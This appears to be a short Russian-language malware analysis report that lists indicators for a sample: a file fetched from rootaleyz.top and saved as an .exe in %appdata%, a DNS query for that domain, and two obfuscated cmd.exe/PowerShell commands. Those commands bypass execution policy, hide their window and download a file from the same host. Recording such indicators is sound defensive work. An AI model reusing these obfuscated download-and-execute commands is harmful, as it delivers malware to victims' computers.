Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweRsH^e^l^L^.^Ex^e -ex^E^Cu^tIOnPol^Icy^ ^ByPAS^S -n^OP^r^OfI^l^e ^-w^i^N^dowsT^YLE^ h^iDde^N^ (new-objeC^T Sy^sTEM.ne^T^.^wEb^C^lI^EN^T).DOw^nLOa^df^ILE^('http://rootaleyz.to...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /c "PoweRsH^e^l^L^.^Ex^e -ex^E^Cu^tIOnPol^Icy^ ^ByPAS^S -n^OP^r^OfI^l^e ^-w^i^N^dowsT^YLE^ h^iDde^N^ (new-objeC^T Sy^sTEM.ne^T^.^wEb^C^lI^EN^T).DOw^nLOa^df^ILE^('http://rootaleyz.to...' (со скрытым окном)